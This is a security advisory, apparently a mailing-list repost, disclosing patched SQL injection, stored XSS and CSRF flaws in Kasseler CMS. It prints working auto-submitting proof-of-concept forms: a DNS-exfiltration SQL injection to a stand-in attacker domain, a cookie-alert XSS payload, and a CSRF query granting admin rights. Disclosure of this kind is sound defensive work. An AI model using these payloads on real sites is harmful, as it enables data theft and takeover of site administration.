看板 Bugtraq 關於我們 聯絡資訊
Advisory ID: HTB23158 Product: Kasseler CMS Vendor: Kasseler CMS Vulnerable Version(s): 2 r1223 and probably prior Tested Version: 2 r1223 Vendor Notification: May 29, 2013=20 Vendor Patch: June 28, 2013=20 Public Disclosure: July 3, 2013=20 Vulnerability Type: SQL Injection [CWE-89], Cross-Site Scripting [CWE-79], = Cross-Site Request Forgery [CWE-352] CVE References: CVE-2013-3727, CVE-2013-3728, CVE-2013-3729 Risk Level: Medium=20 CVSSv2 Base Scores: 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P), 4 (AV:N/AC:L/Au:S/C:N= /I:P/A:N), 5.1 (AV:N/AC:H/Au:N/C:P/I:P/A:P) Solution Status: Fixed by Vendor Discovered and Provided: High-Tech Bridge Security Research Lab ( https://w= ww.htbridge.com/advisory/ )=20 ---------------------------------------------------------------------------= -------------------- Advisory Details: High-Tech Bridge Security Research Lab discovered multiple vulnerabilities = in Kasseler CMS, which can be exploited to perform SQL injection, Cross-Sit= e Scripting (XSS) and Cross-Site Request Forgery (CSRF) attacks and comprom= ise vulnerable application. 1) SQL Injection in Kasseler CMS: CVE-2013-3727 The vulnerability exists due to insufficient validation of "groups" HTTP PO= ST parameter passed to "/admin.php" script. A remote authenticated administ= rator can execute arbitrary SQL commands in application's database. This vulnerability could also be exploited by a remote non-authenticated at= tacker via CSRF vector, since the application is prone to Cross-Site Reques= t Forgery (CSRF) attacks. In order to do so an attacker should trick logged= -in administrator to visit a webpage with CSRF exploit. Basic CSRF exploit code below is based on DNS Exfiltration technique and ma= y be used if the database of the vulnerable application is hosted on a Wind= ows platform. It will send a DNS request demanding IP addess for `version()= ` (or any other sensetive output from the database) subdomain of ".attacker= =2Ecom" (a domain name, DNS server of which is controlled by the attacker): <form action=3D"http://[host]/admin.php?module=3Dsendmail&do=3Dsend " metho= d=3D"post" name=3D"main"> <input type=3D"hidden" name=3D"title" value=3D"1"> <input type=3D"hidden" name=3D"message" value=3D"1"> <input type=3D"hidden" name=3D"attache_page" value=3D"1"> <input type=3D"hidden" name=3D"groups[]" value=3D"123) OR 1=3D(select loa= d_file(CONCAT(CHAR(92),CHAR(92),(select version()),CHAR(46),CHAR(97),CHAR(1= 16),CHAR(116),CHAR(97),CHAR(99),CHAR(107),CHAR(101),CHAR(114),CHAR(46),CHAR= (99),CHAR(111),CHAR(109),CHAR(92),CHAR(102),CHAR(111),CHAR(111),CHAR(98),CH= AR(97),CHAR(114)))) -- "> <input type=3D"hidden" name=3D"" value=3D""> <input type=3D"hidden" name=3D"" value=3D""> <input type=3D"submit" id=3D"btn"> </form> <script> document.main.submit(); </script> 2) Stored Cross-Site Scripting (XSS) in Kasseler CMS: CVE-2013-3728 The vulnerability exists due to insufficient filtration of "cat" HTTP POST = parameter passed to "/admin.php" script. A remote attacker with privileges = to create categories can permanently inject arbitrary HTML and script code = into application database that will be executed in browser of every website= visitor.=20 The following PoC code displays user's cookies using JavaScript 'alert()' f= unction: <form action=3D"http://[host]/admin.php?module=3Dforum&do=3Dadmin_new_categ= ory " method=3D"post" name=3D"main"> <input type=3D"hidden" name=3D"cat" value=3D"<script>alert(document.cooki= e);</script>"> <input type=3D"submit" id=3D"btn"> </form> <script> document.main.submit(); </script> 3) =D0=A1ross-Site Request Forgery (CSRF) in Kasseler CMS: CVE-2013-3729 The vulnerability exists due to absence of CSRF protection mechanisms in th= e entire application. A remote attacker can trick logged-in administrator t= o visit a specially crafted webpage with CSRF exploit code. This will enabl= e the attacker to execute arbitrary SQL queries in application's database a= nd gain complete control over the application. The following CSRF exploit code will grant administrative privileges to use= r with ID=3D2:=20 <form action=3D"http://[host]/admin.php?module=3Ddatabase&do=3Dsql_query " = method=3D"post" name=3D"main"> <input type=3D"hidden" name=3D"query" value=3D"UPDATE `kasseler`.`kassele= r_users` SET `user_level` =3D '2', `user_group` =3D '1' WHERE `kasseler_use= rs`.`uid` =3D2 LIMIT 1 ;"> <input type=3D"submit" id=3D"btn"> </form> <script> document.main.submit(); </script> Registration is open by default, and the attacker can easily get his user I= D user from the profile page: http://[host]/index.php?module=3Daccount&do=3Duser&id=3D2=20 ---------------------------------------------------------------------------= -------------------- Solution: Upgrade to Kasseler CMS 2 r1232. More Information: http://diff.kasseler-cms.net/svn.html http://diff.kasseler-cms.net/svn/patches/1232.html ---------------------------------------------------------------------------= -------------------- References: [1] High-Tech Bridge Advisory HTB23158 - https://www.htbridge.com/advisory/= HTB23158 - Multiple Vulnerabilities in Kasseler CMS. [2] Kasseler CMS - http://www.kasseler-cms.net - Kasseler CMS is a high per= formance content management system. [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - in= ternational in scope and free for public use, CVE=C2=AE is a dictionary of = publicly known information security vulnerabilities and exposures. [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to = developers and security practitioners, CWE is a formal list of software wea= kness types.=20 ---------------------------------------------------------------------------= -------------------- Disclaimer: The information provided in this Advisory is provided "as is" a= nd without any warranty of any kind. Details of this Advisory may be update= d in order to provide as accurate information as possible. The latest versi= on of the Advisory is available on web page [1] in the References.